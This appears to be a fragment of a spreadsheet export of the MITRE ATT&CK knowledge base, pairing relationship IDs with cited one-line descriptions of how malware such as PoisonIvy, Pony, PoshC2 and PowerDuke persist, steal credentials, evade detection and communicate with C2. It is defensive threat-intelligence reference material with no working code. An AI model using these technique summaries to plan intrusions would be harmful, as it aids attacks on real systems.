    <t>relationship--207f1084-a466-4e08-a157-886db373f09a</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a custom encryption scheme for communication between scripts.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--e159049f-70c1-4349-b299-c1d99d06901d</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list all running processes.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--ab2602d5-a3f5-45d2-a522-9b4f87bc7a24</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--d32fb833-c8ad-4d04-b998-3d62a6916966</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has added a registry key in the &lt;RUN&gt; hive for persistence.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--e7f60c3a-5b9e-4175-8bac-72773f580dad</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--64f0efcd-e46a-4bcf-9cbe-4c890e13c01b</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>relationship--d9338b91-b07b-4ea1-9e2f-4fe06e58ce62</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--29686ce0-db1e-4d77-a21c-7b1e97ee51ac</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</si>
  <si>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</si>
  <si>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relationship--6340a1e8-4880-4c91-b4fd-ce909b35b87f</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to gather information about the compromised host.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--77d954c5-de84-4f4b-98b6-5ad35603ae7a</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a "who" command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>relationship--52ad9918-ffba-4897-bbdc-261504094339</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--b078c987-40be-459f-9045-4b2b92cc145b</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used HTTP and HTTPs for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--6d1818b1-0a98-4a1f-9c89-9c44f305e447</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has called cmd through a Word document macro.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>relationship--17db0e04-2e71-4f29-9086-266503e6d000</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry key in the Active Setup pointing to a malicious executable.(Citation: Microsoft PoisonIvy 2017)(Citation: paloalto Tropic Trooper 2016)(Citation: FireEye Regsvr32 Targeting Mongolian Gov)</t>
  </si>
  <si>
    <t>relationship--64b25323-3b00-404f-afaa-cf1808ac5743</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) captures window titles.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--f436f533-1116-499f-b073-9cc7698e18b0</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can steal system information.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--c011e80b-7b86-405a-8d41-745bd37a0d10</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) can inject a malicious DLL into a process.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--7d020981-51b3-4ff6-825f-7cd192c934e1</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--ae7b632b-bb15-4807-be21-bdfff70f4f2e</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) contains a keylogger.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--3ef89472-470c-42c9-be01-155efe607b78</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) stages collected data in a text file.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--7d8e5c4d-afdb-43f9-bfcf-7ed674a516e3</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new system device.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--19161920-e6b5-481f-a240-62f05c624010</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) hides any strings related to its own indicators of compromise.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--27f8b192-9e86-49dc-abca-5bda3f8f7e89</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates run key Registry entries pointing to a malicious executable dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--22879bfd-c9de-480b-83f3-4b58ef6dd08e</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--f8340d49-ee7a-4ade-988f-3660904a18bb</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) uses the Camellia cipher to encrypt communications.(Citation: FireEye Poison Ivy)</t>
  </si>
  <si>
    <t>relationship--b41c9b77-536b-49bc-8cb9-a873aa121002</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can open a command-line interface.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>relationship--962db69e-efe1-4e5f-b845-99294ace5eb0</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</si>
  <si>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</si>
  <si>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relationship--1888d04c-e3ba-47bc-adb3-ab8066678772</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use Twitter, Reddit, Imgur and other websites to get a C2 URL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--9fd03410-47ca-4ddc-9202-8f4a7558b263</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use a custom algorithm to decrypt strings used by the malware.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--fe2eb5b7-7ae1-4df1-a49e-ad13f50510e8</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can store encrypted JSON configuration files in the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--1b45a635-4384-4cce-ac50-49826659dcb2</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can retrieve payloads from the C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--28d3336f-108b-40fb-b3d7-9ec4311931c4</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can write encrypted JSON configuration files to the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--190057d5-13ad-40d2-a2f0-0177850e2905</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use &lt;code&gt;LoadLibraryW&lt;/code&gt; and &lt;code&gt;CreateProcess&lt;/code&gt; to load and execute code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--630d1f21-549f-415a-968c-bd3dc3c6fb7f</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can custom encrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--194d773b-a9b6-43fc-8113-8e120be95c5c</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--2f25c2ba-ee4b-41e7-9cf9-7a0960f3e77c</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use steganography to hide C2 information in images.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--e9342a76-171e-4831-96b7-d998a6de8282</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) has has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--a273ce5e-9ca8-4093-a815-3a3a60a16a97</t>
  </si>
  <si>
    <t>S0453</t>
  </si>
  <si>
    <t>Pony</t>
  </si>
  <si>
    <t>malware--222ba512-32d9-49ac-aefd-50ce981ce2ce</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--f2810da3-1a6f-4c48-826d-929bde7f7af3</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) can download additional files onto the infected system.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--3ea6e72b-3d19-4864-aebd-cc31dad7d519</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used the &lt;code&gt;NetUserEnum&lt;/code&gt; function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--d5ecfa68-2027-4dd5-adf0-1eb82463cfc5</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>relationship--0d1cb122-5195-4d04-b5c9-85f4747886fa</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--a0b2b4b4-c522-4428-a70b-ad1002417a28</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--237cd65a-e30e-4f8a-9822-f50b818e1491</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--02075984-9bec-465e-8a21-6717b9a1308b</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</si>
  <si>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</si>
  <si>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relationship--4b2fa1ed-6c4f-4974-a44e-beeadf3a887c</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--dd8d683a-0c17-448f-b604-105e130f4b04</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>relationship--cbdb211a-2772-4905-99f1-0415fb0738b3</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--5853ff4e-9982-4d66-bf98-6c22fa42f305</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has collected the Service Pack, language, and region information to send to the C2.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--8dd83463-b0cb-46e9-a01a-b22c6780066f</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--8f5e9158-1abe-4ed7-8a0a-df07f629aac8</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--a6dd4567-92ac-47e3-9688-2d555c239705</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used batch scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>relationship--404f482d-160d-47ea-9eff-5ca7392eb5b2</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-TokenManipulation for manipulating tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--cb498ebf-bdb4-476c-9b7a-1a83c19d03fb</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for compressing data using ZIP.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--617ce344-2317-433a-b283-8e67b90b00f7</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for recursively parsing through files and directories to gather valid credit card numbers.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--45d6e0d0-5de1-4382-ae08-acf4f035a740</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for brute forcing local administrator and AD user accounts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--8303719d-b2ed-4860-9af4-57b636c4f865</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can utilize multiple methods to bypass UAC.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--3657d3de-d279-47f0-ab54-68ca82f4536d</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-RunAs to make tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--331528b5-fe7e-4ca4-ad3a-c18b20298f28</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for searching for passwords in local and remote files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--0e46421a-6804-488e-adad-42cac34065be</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can decrypt passwords stored in the RDCMan configuration file.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>relationship--f461e96f-1d76-4a40-ad84-8f7f7c3cc202</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate local and domain user account information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--60f2ddcf-9b88-4a87-8baf-2777c9c49d39</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for enumerating domain trusts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--c8f79da7-cfd6-41fd-89d4-c015e7289b64</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--248b1bfc-5f9a-4f2c-ad6c-556045d9e83b</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for exploiting SMB via EternalBlue.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--bd1282fe-7a81-432b-9ac7-f93fb8f8b33f</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate files on the local file system and includes a module for enumerating recently accessed files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--7af39008-1480-4524-b8ce-e285628f61be</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--5f8f4204-228c-49d3-8ec6-863b13038001</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--13f5f3ac-e16b-4b7a-8b6d-6eaf129231e7</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--8c1446c4-66b2-4b70-96df-7fd2414522be</t>
  </si>
  <si>
    <t>relationship--426daf58-7fab-49c8-b5cb-722f3e46a75a</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-LocAdm&lt;/code&gt; for enumerating permission groups.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--75fcbeab-4f32-4e6d-a02a-9d5509fd4c4f</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can perform port scans from an infected host.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--e45bff55-f8b0-406b-ba7d-03af2e7be8c8</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for taking packet captures on compromised hosts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--f9fb0958-7f80-4bd5-80c2-9665124f1d0e</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that leverage pass the hash for lateral movement.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--64f33d8d-6060-40ab-8fbb-bd8b249702f7</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use &lt;code&gt;Get-PassPol&lt;/code&gt; to enumerate the domain password policy.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--fd074370-f9d4-43a1-bf1f-0afdb46ab28b</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--95fac0e8-32e3-4854-b542-5eb897d76f2e</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules that allow for use of proxies in command and control.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--82758a74-b7e2-4839-ad52-bdc6c57c0dba</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [PsExec](https://attack.mitre.org/software/S0029) for remote execution.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--37b7ba1e-5093-4a0d-920b-c86d3c9c766b</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-ComputerInfo&lt;/code&gt;, for enumerating common system information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--59fe8c5d-f008-4be7-a187-39d70073914d</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate network adapter information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--092b3643-670d-447c-b05d-f7a54a945412</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [netstat](https://attack.mitre.org/software/S0104) to enumerate TCP and UDP connections.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--209075a3-e836-4894-b931-663bb785e96b</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate service and service permission information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--317b8a78-1c04-4cd7-a249-619bacfc7a44</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use protocols like HTTP/HTTPS for command and control traffic.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--16e57ad0-b460-41bd-bef0-5bf110d8db8f</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that use WMI to execute tasks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--1c715763-19ea-475d-9d5c-8d4434b4095f</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has the ability to persist on a system using WMI events.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>relationship--fbce0681-c5d2-4ea9-b48a-4fc42448f9e0</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can side-load `Goopdate.dll` into `GoogleUpdate.exe`.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>relationship--b3b21563-6835-4478-a882-64ce66d5591b</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can decrypt PowerShell scripts for execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>relationship--c935af5a-b6e3-41b8-afa8-f9d7ad593201</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can receive encrypted commands from C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--3c5b31ff-ba6a-47c0-adbe-ddd18845f684</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) has disguised a PowerShell script as a .dat file (goopdate.dat).(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--757e8e47-b89d-4a70-a785-deefe6468006</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) has used a DLL named Goopdate.dll to impersonate a legitimate Google update file.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--d0e52896-097b-4133-9aee-75b74a4bbc7c</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can use a modified Base64 encoding mechanism to send data to and from the C2 server.(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>relationship--eeb8c856-ed89-47f5-a725-e74e7a2c20c3</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) has the ability to use PowerShell scripts to execute commands.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--a7fb30f9-eb52-4706-958a-4cabe0e68e12</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can send HTTP GET requests to malicious servers.(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>relationship--a78399ce-b5c4-4484-bdbb-3f9367cb1403</t>
  </si>
  <si>
    <t>S0177</t>
  </si>
  <si>
    <t>Power Loader</t>
  </si>
  <si>
    <t>malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3</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</si>
  <si>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</si>
  <si>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relationship--c56de8bc-ad9e-415a-8840-ae294ed4f88a</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get text of the current foreground window.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--43d85ed6-223e-4402-bd29-be10a872359d</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to write random data across a file and delete it.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--5135ba35-04b7-4cfc-bc6c-03f63206e757</t>
  </si>
  <si>
    <t>relationship--789cf81d-bfc9-4c1a-a34a-57e41981894a</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--24ea53e3-a51f-4c4a-b3de-2e1d09ed69e8</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to download a file.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--8ef27cd6-3909-4174-b57c-3dbe3061a6dd</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) hides many of its backdoor payloads in an alternate data stream (ADS).(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--91f59958-db5f-429c-9608-a033ea68486b</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to list the victim's processes.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--62f9aa2c-b0c1-4028-a2b8-c436e30ace4b</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) achieves persistence by using various Registry Run keys.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--f0b00a47-9d63-4d05-b771-022a21a4ed06</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--1cbf5583-626a-4a24-bc59-f3b973752cee</t>
  </si>
  <si>
    <t xml:space="preserve">[PowerDuke](https://attack.mitre.org/software/S0139) uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).(Citation: Volexity PowerDuke November 2016) </t>
  </si>
  <si>
    <t>relationship--18f4bc4e-ef29-4fe4-ace3-c4671f94ccef</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get information about the victim's name, build, version, serial number, and memory usage.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--1fda6ff7-a344-4bc3-b545-4083cc15290d</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get the victim's domain and NetBIOS name.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--0db8a021-2f3a-41cc-abc6-d8723c7e802b</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current user's name and SID.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--5efe685d-66a6-4f1f-8779-4aae5db859d0</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the time the machine was built, the time, and the time zone.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--6b38f460-e309-4ab1-bbc9-bd0bb30f4af9</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) runs &lt;code&gt;cmd.exe /c&lt;/code&gt; and sends the output to its C2.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--e465e173-04d8-4a2b-8953-a2fa3b44aec0</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can encrypt browser database files prior to exfiltration.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--8b16a324-45f2-4e90-8c30-39229b352fb7</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) has a browser info stealer module that can read Chrome and Edge browser database files.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--4a4ff6a4-c6b1-4bb4-87f4-c28059c7dd39</t>
  </si>
  <si>
    <t xml:space="preserve">[PowerLess](https://attack.mitre.org/software/S1012) has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.(Citation: Cybereason PowerLess February 2022)
</t>
  </si>
  <si>
    <t>relationship--543dd290-70eb-402f-8d40-93b4a240d4a1</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use base64 and AES ECB decryption prior to execution of downloaded modules.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--dfcd4d41-11f4-4891-9e49-7a725ab18d1d</t>
  </si>
  <si>
